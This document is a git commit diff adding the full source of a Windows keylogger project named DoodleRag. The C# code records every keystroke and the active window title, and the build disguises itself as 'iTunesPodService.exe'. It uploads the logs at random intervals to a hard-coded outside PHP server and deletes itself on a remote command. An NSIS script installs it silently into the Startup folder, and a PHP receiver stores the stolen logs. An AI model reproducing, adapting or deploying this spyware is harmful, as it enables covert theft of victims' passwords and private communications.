diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2010-04-19 02:53:35 -0400 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2010-04-19 02:53:35 -0400 |
| commit | 97ce1cba643f91cf6dcec3b3be173b764d2670e1 (patch) | |
| tree | 1e6c41ed80db49c62cd7bb42d1d52dfe5f78f99c | |
| download | DoodleRag-97ce1cba643f91cf6dcec3b3be173b764d2670e1.tar.xz DoodleRag-97ce1cba643f91cf6dcec3b3be173b764d2670e1.zip | |
Initial commit.
| -rw-r--r-- | .gitignore | 5 | ||||
| -rw-r--r-- | DoodleRag.csproj | 107 | ||||
| -rw-r--r-- | DoodleRag.sln | 19 | ||||
| -rw-r--r-- | Keylogger.cs | 268 | ||||
| -rw-r--r-- | Main.cs | 21 | ||||
| -rw-r--r-- | Uploader.cs | 81 | ||||
| -rw-r--r-- | installer.nsi | 9 | ||||
| -rw-r--r-- | logger.php | 32 |
8 files changed, 542 insertions, 0 deletions
diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..1981c02 --- /dev/null +++ b/.gitignore @@ -0,0 +1,5 @@ +*.suo +*.user +*.exe +bin +obj diff --git a/DoodleRag.csproj b/DoodleRag.csproj new file mode 100644 index 0000000..da60ac0 --- /dev/null +++ b/DoodleRag.csproj @@ -0,0 +1,107 @@ +<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <PropertyGroup>
+ <ProjectType>Local</ProjectType>
+ <ProductVersion>8.0.50727</ProductVersion>
+ <SchemaVersion>2.0</SchemaVersion>
+ <ProjectGuid>{AFD1F7AF-7974-40CE-9E95-F984D99A572D}</ProjectGuid>
+ <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+ <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+ <ApplicationIcon>
+ </ApplicationIcon>
+ <AssemblyKeyContainerName>
+ </AssemblyKeyContainerName>
+ <AssemblyName>iTunesPodService</AssemblyName>
+ <AssemblyOriginatorKeyFile>
+ </AssemblyOriginatorKeyFile>
+ <DefaultClientScript>JScript</DefaultClientScript>
+ <DefaultHTMLPageLayout>Grid</DefaultHTMLPageLayout>
+ <DefaultTargetSchema>IE50</DefaultTargetSchema>
+ <DelaySign>false</DelaySign>
+ <OutputType>WinExe</OutputType>
+ <RootNamespace>Logger</RootNamespace>
+ <RunPostBuildEvent>OnBuildSuccess</RunPostBuildEvent>
+ <StartupObject>
+ </StartupObject>
+ <FileUpgradeFlags>
+ </FileUpgradeFlags>
+ <UpgradeBackupLocation>
+ </UpgradeBackupLocation>
+ </PropertyGroup>
+ <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+ <OutputPath>bin\Debug\</OutputPath>
+ <AllowUnsafeBlocks>false</AllowUnsafeBlocks>
+ <BaseAddress>285212672</BaseAddress>
+ <CheckForOverflowUnderflow>false</CheckForOverflowUnderflow>
+ <ConfigurationOverrideFile>
+ </ConfigurationOverrideFile>
+ <DefineConstants>DEBUG;TRACE</DefineConstants>
+ <DocumentationFile>
+ </DocumentationFile>
+ <DebugSymbols>true</DebugSymbols>
+ <FileAlignment>4096</FileAlignment>
+ <NoStdLib>false</NoStdLib>
+ <NoWarn>
+ </NoWarn>
+ <Optimize>false</Optimize>
+ <RegisterForComInterop>false</RegisterForComInterop>
+ <RemoveIntegerChecks>false</RemoveIntegerChecks>
+ <TreatWarningsAsErrors>false</TreatWarningsAsErrors>
+ <WarningLevel>4</WarningLevel>
+ <DebugType>full</DebugType>
+ <ErrorReport>prompt</ErrorReport>
+ </PropertyGroup>
+ <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+ <OutputPath>bin\Release\</OutputPath>
+ <AllowUnsafeBlocks>false</AllowUnsafeBlocks>
+ <BaseAddress>285212672</BaseAddress>
+ <CheckForOverflowUnderflow>false</CheckForOverflowUnderflow>
+ <ConfigurationOverrideFile>
+ </ConfigurationOverrideFile>
+ <DefineConstants>TRACE</DefineConstants>
+ <DocumentationFile>
+ </DocumentationFile>
+ <DebugSymbols>false</DebugSymbols>
+ <FileAlignment>4096</FileAlignment>
+ <NoStdLib>false</NoStdLib>
+ <NoWarn>
+ </NoWarn>
+ <Optimize>true</Optimize>
+ <RegisterForComInterop>false</RegisterForComInterop>
+ <RemoveIntegerChecks>false</RemoveIntegerChecks>
+ <TreatWarningsAsErrors>false</TreatWarningsAsErrors>
+ <WarningLevel>4</WarningLevel>
+ <DebugType>none</DebugType>
+ <ErrorReport>prompt</ErrorReport>
+ </PropertyGroup>
+ <ItemGroup>
+ <Reference Include="System">
+ <Name>System</Name>
+ </Reference>
+ <Reference Include="System.Data">
+ <Name>System.Data</Name>
+ </Reference>
+ <Reference Include="System.Web" />
+ <Reference Include="System.Windows.Forms">
+ <Name>System.Windows.Forms</Name>
+ </Reference>
+ <Reference Include="System.Xml">
+ <Name>System.XML</Name>
+ </Reference>
+ </ItemGroup>
+ <ItemGroup>
+ <Compile Include="Keylogger.cs">
+ <SubType>Code</SubType>
+ </Compile>
+ <Compile Include="Main.cs">
+ <SubType>Code</SubType>
+ </Compile>
+ <Compile Include="Uploader.cs" />
+ </ItemGroup>
+ <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+ <PropertyGroup>
+ <PreBuildEvent>
+ </PreBuildEvent>
+ <PostBuildEvent>
+ </PostBuildEvent>
+ </PropertyGroup>
+</Project>
\ No newline at end of file diff --git a/DoodleRag.sln b/DoodleRag.sln new file mode 100644 index 0000000..4b12b46 --- /dev/null +++ b/DoodleRag.sln @@ -0,0 +1,19 @@ +Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DoodleRag", "DoodleRag.csproj", "{AFD1F7AF-7974-40CE-9E95-F984D99A572D}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {AFD1F7AF-7974-40CE-9E95-F984D99A572D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {AFD1F7AF-7974-40CE-9E95-F984D99A572D}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {AFD1F7AF-7974-40CE-9E95-F984D99A572D}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {AFD1F7AF-7974-40CE-9E95-F984D99A572D}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/Keylogger.cs b/Keylogger.cs new file mode 100644 index 0000000..d150fc5 --- /dev/null +++ b/Keylogger.cs @@ -0,0 +1,268 @@ +using System;
+using System.Threading;
+using System.IO;
+using System.Text;
+using System.Windows.Forms;
+using System.Runtime.InteropServices;
+
+namespace Logger
+{
+ public class Keylogger
+ {
+ [DllImport("User32.dll")]
+ private static extern short GetAsyncKeyState(Keys vKey);
+ [DllImport("User32.dll")]
+ private static extern short GetAsyncKeyState(int vKey);
+ [DllImport("User32.dll")]
+ public static extern int GetWindowText(int hwnd, StringBuilder s, int nMaxCount);
+ [DllImport("User32.dll")]
+ public static extern int GetForegroundWindow();
+
+ private StringBuilder buffer;
+ private string hWndTitle;
+ private string hWndTitlePast;
+ private bool tglAlt = false;
+ private bool tglControl = false;
+ private bool tglCapslock = false;
+
+ public Keylogger()
+ {
+ buffer = new StringBuilder(10000);
+ new Thread(new ThreadStart(logKey)).Start();
+ }
+
+ public static string ActiveApplTitle()
+ {
+ int hwnd = GetForegroundWindow();
+ StringBuilder sbTitle = new StringBuilder(1024);
+ int intLength = GetWindowText(hwnd, sbTitle, sbTitle.Capacity);
+ if ((intLength <= 0) || (intLength > sbTitle.Length)) return "unknown";
+ return sbTitle.ToString();
+ }
+
+ private void logKey()
+ {
+ while (true)
+ {
+ string keyBuffer = string.Empty;
+ hWndTitle = ActiveApplTitle();
+
+ if (hWndTitle != hWndTitlePast || hWndTitlePast == null)
+ {
+ keyBuffer += "\n\n[" + hWndTitle + "]\n";
+ hWndTitlePast = hWndTitle;
+ }
+
+ foreach (int i in Enum.GetValues(typeof(Keys)))
+ {
+ if (GetAsyncKeyState(i) == -32767)
+ {
+ if (Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey) & 0x8000))
+ {
+ if (!tglControl)
+ {
+ tglControl = true;
+ keyBuffer += "<Ctrl=On>";
+ }
+ }
+ else
+ {
+ if (tglControl)
+ {
+ tglControl = false;
+ keyBuffer += "<Ctrl=Off>";
+ }
+ }
+ if (Convert.ToBoolean(GetAsyncKeyState(Keys.Menu) & 0x8000))
+ {
+ if (!tglAlt)
+ {
+ tglAlt = true;
+ keyBuffer += "<Alt=On>";
+ }
+ }
+ else
+ {
+ if (tglAlt)
+ {
+ tglAlt = false;
+ keyBuffer += "<Alt=Off>";
+ }
+ }
+ if (Convert.ToBoolean(GetAsyncKeyState(Keys.CapsLock) & 0x8000))
+ {
+ if (!tglCapslock)
+ {
+ tglCapslock = true;
+ keyBuffer += "<CapsLock=On>";
+ }
+ }
+ else
+ {
+ if (tglCapslock)
+ {
+ tglCapslock = false;
+ keyBuffer += "<CapsLock=Off>";
+ }
+ }
+ if (Enum.GetName(typeof(Keys), i) == "LButton")
+ keyBuffer += "<LMouse>";
+ else if (Enum.GetName(typeof(Keys), i) == "RButton")
+ keyBuffer += "<RMouse>";
+ else if (Enum.GetName(typeof(Keys), i) == "Back")
+ keyBuffer += "<Backspace>";
+ else if (Enum.GetName(typeof(Keys), i) == "Space")
+ keyBuffer += " ";
+ else if (Enum.GetName(typeof(Keys), i) == "Return")
+ keyBuffer += "<Enter>";
+ else if (Enum.GetName(typeof(Keys), i) == "ControlKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "LControlKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "RControlKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "LControlKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "ShiftKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "LShiftKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "RShiftKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "Delete")
+ keyBuffer += "<Del>";
+ else if (Enum.GetName(typeof(Keys), i) == "Insert")
+ keyBuffer += "<Ins>";
+ else if (Enum.GetName(typeof(Keys), i) == "Home")
+ keyBuffer += "<Home>";
+ else if (Enum.GetName(typeof(Keys), i) == "End")
+ keyBuffer += "<End>";
+ else if (Enum.GetName(typeof(Keys), i) == "Tab")
+ keyBuffer += "<Tab>";
+ else if (Enum.GetName(typeof(Keys), i) == "Prior")
+ keyBuffer += "<Page Up>";
+ else if (Enum.GetName(typeof(Keys), i) == "PageDown")
+ keyBuffer += "<Page Down>";
+ else if (Enum.GetName(typeof(Keys), i) == "LWin" || Enum.GetName(typeof(Keys), i) == "RWin")
+ keyBuffer += "<Win>";
+ if (Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey) & 0x8000))
+ {
+ if (i >= 65 && i <= 122)
+ {
+ keyBuffer += (char)i;
+ }
+ else if (i.ToString() == "49")
+ keyBuffer += "!";
+ else if (i.ToString() == "50")
+ keyBuffer += "@";
+ else if (i.ToString() == "51")
+ keyBuffer += "#";
+ else if (i.ToString() == "52")
+ keyBuffer += "$";
+ else if (i.ToString() == "53")
+ keyBuffer += "%";
+ else if (i.ToString() == "54")
+ keyBuffer += "^";
+ else if (i.ToString() == "55")
+ keyBuffer += "&";
+ else if (i.ToString() == "56")
+ keyBuffer += "*";
+ else if (i.ToString() == "57")
+ keyBuffer += "(";
+ else if (i.ToString() == "48")
+ keyBuffer += ")";
+ else if (i.ToString() == "192")
+ keyBuffer += "~";
+ else if (i.ToString() == "189")
+ keyBuffer += "_";
+ else if (i.ToString() == "187")
+ keyBuffer += "+";
+ else if (i.ToString() == "219")
+ keyBuffer += "{";
+ else if (i.ToString() == "221")
+ keyBuffer += "}";
+ else if (i.ToString() == "220")
+ keyBuffer += "|";
+ else if (i.ToString() == "186")
+ keyBuffer += ":";
+ else if (i.ToString() == "222")
+ keyBuffer += "\"";
+ else if (i.ToString() == "188")
+ keyBuffer += "<";
+ else if (i.ToString() == "190")
+ keyBuffer += ">";
+ else if (i.ToString() == "191")
+ keyBuffer += "?";
+ }
+ else
+ {
+ if (i >= 65 && i <= 122)
+ {
+ keyBuffer += (char)(i + 32);
+ }
+ else if (i.ToString() == "49")
+ keyBuffer += "1";
+ else if (i.ToString() == "50")
+ keyBuffer += "2";
+ else if (i.ToString() == "51")
+ keyBuffer += "3";
+ else if (i.ToString() == "52")
+ keyBuffer += "4";
+ else if (i.ToString() == "53")
+ keyBuffer += "5";
+ else if (i.ToString() == "54")
+ keyBuffer += "6";
+ else if (i.ToString() == "55")
+ keyBuffer += "7";
+ else if (i.ToString() == "56")
+ keyBuffer += "8";
+ else if (i.ToString() == "57")
+ keyBuffer += "9";
+ else if (i.ToString() == "48")
+ keyBuffer += "0";
+ else if (i.ToString() == "189")
+ keyBuffer += "-";
+ else if (i.ToString() == "187")
+ keyBuffer += "=";
+ else if (i.ToString() == "92")
+ keyBuffer += "`";
+ else if (i.ToString() == "219")
+ keyBuffer += "[";
+ else if (i.ToString() == "221")
+ keyBuffer += "]";
+ else if (i.ToString() == "220")
+ keyBuffer += "\\";
+ else if (i.ToString() == "186")
+ keyBuffer += ";";
+ else if (i.ToString() == "222")
+ keyBuffer += "'";
+ else if (i.ToString() == "188")
+ keyBuffer += ",";
+ else if (i.ToString() == "190")
+ keyBuffer += ".";
+ else if (i.ToString() == "191")
+ keyBuffer += "/";
+ }
+ }
+ }
+ lock (buffer)
+ {
+ buffer.Append(keyBuffer);
+ }
+ Thread.Sleep(8);
+ }
+ }
+
+ public string PopLog()
+ {
+ string log;
+ lock (buffer)
+ {
+ log = buffer.ToString();
+ buffer = new StringBuilder(10000);
+ }
+ return log;
+ }
+
+ }
+}
@@ -0,0 +1,21 @@ +using System;
+
+namespace Logger
+{
+ class MainApp
+ {
+ [STAThread]
+ static void Main(string[] args)
+ {
+ Keylogger kl = new Keylogger();
+ Uploader upload = new Uploader("http://doodlerag.100webspace.net/logger.php?mode=log");
+ Random rnd = new Random();
+ upload.UploadLog("\n**DoodleRag startup: " + DateTime.Now.ToString() + "**\n");
+ while (true)
+ {
+ System.Threading.Thread.Sleep(rnd.Next(5 * 60 * 1000, 20 * 60 * 1000));
+ upload.UploadLog(kl.PopLog());
+ }
+ }
+ }
+}
diff --git a/Uploader.cs b/Uploader.cs new file mode 100644 index 0000000..9ec225b --- /dev/null +++ b/Uploader.cs @@ -0,0 +1,81 @@ +using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Threading;
+using System.IO;
+using System.Diagnostics;
+
+namespace Logger
+{
+ class Uploader
+ {
+ private Queue<string> uploadQueue;
+ private string uploadUrl;
+ public Uploader(string url)
+ {
+ uploadUrl = url;
+ uploadQueue = new Queue<string>();
+ }
+ public void UploadLog(string log)
+ {
+ lock (uploadQueue)
+ {
+ uploadQueue.Enqueue(log);
+ if (uploadQueue.Count == 1)
+ {
+ ThreadPool.QueueUserWorkItem(new WaitCallback(uploadLoop));
+ }
+ }
+ }
+ private string uploadNext()
+ {
+ try
+ {
+ System.Net.WebRequest req = System.Net.WebRequest.Create(uploadUrl);
+ req.ContentType = "application/x-www-form-urlencoded";
+ req.Method = "POST";
+ byte[] bytes;
+ lock (uploadQueue)
+ {
+ bytes = System.Text.Encoding.ASCII.GetBytes("log=" + System.Web.HttpUtility.UrlEncode(uploadQueue.Peek()));
+ }
+ req.ContentLength = bytes.Length;
+ System.IO.Stream os = req.GetRequestStream();
+ os.Write(bytes, 0, bytes.Length);
+ os.Close();
+ System.Net.WebResponse resp = req.GetResponse();
+ if (resp == null) return null;
+ System.IO.StreamReader sr = new System.IO.StreamReader(resp.GetResponseStream());
+ return sr.ReadToEnd().Trim();
+ }
+ catch { return null; }
+ }
+ private void uploadLoop(object data)
+ {
+ while (uploadQueue.Count > 0)
+ {
+ switch (uploadNext())
+ {
+ case "success":
+ lock (uploadQueue)
+ {
+ uploadQueue.Dequeue();
+ }
+ break;
+ case null:
+ case "":
+ Thread.Sleep(60000);
+ break;
+ case "remove":
+ StreamWriter sw = File.CreateText("selfdelete.bat");
+ string filename = Process.GetCurrentProcess().MainModule.FileName;
+ sw.Write("tskill /A \"{1}\"\n:Repeat\ndel \"{0}\"\nif exist \"{0}\" goto Repeat\ndel \"selfdelete.bat\"", filename, filename.Substring(filename.LastIndexOf(System.IO.Path.DirectorySeparatorChar) + 1));
+ sw.Close();
+ Process.Start("selfdelete.bat");
+ Process.GetCurrentProcess().Kill();
+ break;
+ }
+ }
+ }
+ }
+}
diff --git a/installer.nsi b/installer.nsi new file mode 100644 index 0000000..3fb7571 --- /dev/null +++ b/installer.nsi @@ -0,0 +1,9 @@ +OutFile "doodlerag.exe"
+SilentInstall silent
+
+Section
+ SetSilent silent
+ SetOutPath "$SMSTARTUP"
+ File "bin\Release\iTunesPodService.exe"
+ Exec "$SMSTARTUP/iTunesPodService.exe"
+SectionEnd
\ No newline at end of file diff --git a/logger.php b/logger.php new file mode 100644 index 0000000..9223d65 --- /dev/null +++ b/logger.php @@ -0,0 +1,32 @@ +<?php +header("Content-Type: text/plain"); +if ($_GET["mode"] == "log") { + $file = fopen("logger.txt", "a"); + fwrite($file, $_POST["log"]); + fclose($file); + if (file_exists("remove")) echo "remove"; + else echo "success"; +} +elseif ($_GET["mode"] == "disable") { + @fclose(@fopen("remove", "a")); + echo "disabled. logger will uninstall itself at next upload."; +} +elseif ($_GET["mode"] == "enable") { + @unlink("remove"); + echo "enabled. please reinstall logger."; +} +elseif ($_GET["mode"] == "clearlog") { + @unlink("logger.txt"); + echo "log has been removed from server."; +} +elseif ($_GET["mode"] == "deleteeverything") { + @unlink("logger.php"); + @unlink("logger.txt"); + @unlink("remove"); + echo "everything is now gone. goodbye dave."; +} +else { + echo "====== LOG FILE ======\n"; + readfile("logger.txt"); +} +?> |